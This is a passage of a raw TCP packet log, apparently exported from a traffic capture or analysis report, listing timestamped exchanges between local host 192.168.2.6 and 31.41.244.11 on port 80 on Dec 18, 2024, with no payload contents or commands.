                                                                                                                                                                  Dec 18, 2024 11:09:48.595860958 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.595876932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.595925093 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.596859932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.596910000 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.596988916 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.597033024 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.597873926 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.597920895 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.597968102 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.598011971 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.598952055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.599005938 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.599370003 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.599412918 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.599940062 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.599987984 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.601006031 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.601042986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.601052999 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.601082087 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.601593018 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.601640940 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.601996899 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.602042913 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.602128029 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.602170944 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.603046894 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.603100061 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.604093075 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.604141951 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.604146004 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.604182959 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.604186058 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.604219913 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.621495008 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.621548891 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.621557951 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.621587992 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.621603012 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.621638060 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.621639013 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.621675968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.622303009 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.622351885 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.622355938 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.622397900 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.623330116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.623378992 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.624000072 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.624049902 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.624393940 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.624439001 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.624443054 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.624485016 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.625458002 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.625505924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.625606060 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.625650883 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.626754045 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.626801014 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.627031088 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.627077103 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.627954960 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.628005028 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.628042936 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.628088951 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.628529072 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.628577948 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.628993988 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.629041910 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.629376888 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.629421949 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.629432917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.629460096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.630403042 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.630453110 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.631406069 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.631443024 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.631453037 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.631479979 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.631479979 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.631541967 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.632421970 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.632472038 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.632939100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.632986069 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.633521080 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.633555889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.633568048 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.633594036 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.634471893 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.634558916 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.634576082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.634598970 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.635494947 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.635550022 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.636594057 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.636627913 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.636641026 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.636663914 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.636666059 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.636699915 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.637588978 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.637635946 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.638155937 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.638206005 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.638626099 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.638659954 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.638679981 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.638700008 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.639620066 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.639674902 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.639729977 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.639775991 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.640686989 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.640738964 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.640795946 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.640840054 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.641699076 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.641752958 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.642194986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.642241955 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.642765045 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.642812967 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.642971992 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.643017054 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.643747091 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.643796921 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.644321918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.644371033 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.644777060 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.644855976 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.644871950 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.644895077 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.646358967 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.646394014 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.646416903 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.646440983 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.647125959 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.647176027 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.647367954 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.647413015 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.647855043 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.647902966 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.648344040 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.648394108 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.648890972 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.648948908 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.648993969 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.649036884 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.715575933 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.715676069 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.715698957 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.715723991 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.715823889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.715858936 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.715867043 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.715898991 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.716329098 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.716382027 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.716428995 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.716475964 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.717323065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.717365026 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.717751026 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.717802048 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.718386889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.718436956 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.718758106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.718801975 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.719384909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.719428062 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.719835043 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.719886065 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.720305920 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.720360041 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.720885992 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.720940113 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.721040010 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.721086979 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.721970081 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.722019911 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.722052097 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.722099066 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.723346949 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.723382950 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.723391056 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.723423958 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.724648952 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.724697113 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.724968910 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.725009918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.725013971 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.725025892 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.725048065 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.725064039 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.726512909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.726528883 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.726558924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.726577044 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.727368116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.727379084 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.727411032 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.728719950 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.728730917 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.728765011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.728784084 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.730057955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.730077028 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.730088949 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.730103970 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.730125904 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.731134892 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.731146097 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.731163025 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.731194973 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.731216908 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.733023882 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.733037949 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.733077049 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.733326912 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.733341932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.733385086 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.733413935 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.740855932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.740907907 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.740969896 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.741003990 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.741019011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.741044998 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.741137981 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.741179943 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.741929054 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.741981983 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.741990089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.742027044 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.743005037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.743041992 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.743058920 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.743083000 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.744175911 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.744227886 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.744230032 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.744268894 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.745229006 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.745265007 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.745276928 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.745301962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.746145964 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.746195078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.746308088 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.746349096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.747533083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.747572899 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.747581959 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.747611046 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.748497009 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.748534918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.748543978 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.748577118 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.749475956 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.749512911 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.749522924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.749552011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.750232935 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.750278950 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.750535965 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.750576019 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.751306057 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.751353979 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.751354933 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.751390934 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.752396107 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.752432108 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.752441883 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.752471924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.754046917 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.754090071 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.754095078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.754129887 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.754308939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.754354000 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.754549980 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.754591942 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.755521059 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.755558968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.755568981 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.755599976 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.757352114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.757380962 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.757390976 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.757395029 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.757409096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.757426023 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.758485079 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.758495092 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.758506060 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.758527040 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.758549929 CET4996680192.168.2.631.41.244.11
